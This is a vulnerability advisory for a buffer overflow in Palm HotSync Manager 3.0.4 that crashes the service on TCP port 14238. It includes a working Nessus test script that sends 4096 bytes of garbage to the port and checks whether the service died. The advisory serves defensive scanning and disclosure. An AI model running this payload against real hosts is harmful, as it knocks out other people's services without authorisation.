COMMAND

    Hotsync

SYSTEMS AFFECTED

    Palm Pilot (HotSync Manager 3.0.4 under Windows 98)

PROBLEM

    Aviram Jenik  found following.   A hotsync  DoS attack  is not  as
    sexy as breaking to networks  via printers, but it still  deserves
    some  attention.   The  Palm  Hotsync  manager  is vulnerable to a
    buffer overflow attack that can crash the hotsync application  and
    possibly be used to execute arbitrary code on the machine  running
    the hotsync.

    When the Hotsync manager is  set to 'network' mode, it  listens on
    port  14238.   By  sending  a  large  amount  of data to that port
    followed  by  a  newline,  it's  possible  to  crash  the  HotSync
    application.

    Full advisory can be found at:

        http://www.securiteam.com/exploits/Palm_HotSync_Manager_is_vulnerable_to_Denial_of_Service_attack.html

    The following Nessus Plugin can be used to test this:

    #
    # This script was written by Noam Rathaus <noamr@securiteam.com>
    #
    # See the Nessus Scripts License for details
    #
    #
    if(description)
    {
    name["english"] = "HotSync Manager Denial of
    Service attack";
    script_name(english:name["english"]);
    
    desc["english"] = "It is possible to cause
    HotSync Manager to crash by sending a few bytes
    of garbage into its listening port TCP 14238.
    
    Solution: Block those ports from outside
    communication
    
    Risk factor : Low";
    
    script_description(english:desc["english"]);
    
    summary["english"] = "HotSync Manager Denial of
    Service attack";
    script_summary(english:summary["english"]);
    
    script_category(ACT_DENIAL);
    
    script_copyright(english:"This script is
    Copyright (C) 1999 SecuriTeam");
    family["english"] = "Windows";
    script_family(english:family["english"]);
    
    
    exit(0);
    }
    
    #
    # The script code starts here
    #
    
    if (get_port_state(14238))
    {
    sock14238 = open_sock_tcp(14238);
    if (sock14238)
    {
      data_raw = crap(4096) + string("\n");
      send(socket:sock14238, data:data_raw);
      close(sock14238);
    
      sleep(5);
    
      sock14238_sec = open_sock_tcp(14238);
      if (sock14238_sec)
      {
       security_warning(port:14238, data:"HotSync Manager port is open.");
      }
      else
      {
       security_hole(port:14238);
      }
    }
    }

SOLUTION

    HotSync Manager  under Windows  2000.   3Com has  been notified of
    this, and promised  that the next  release of the  Hotsync manager
    will be fixed.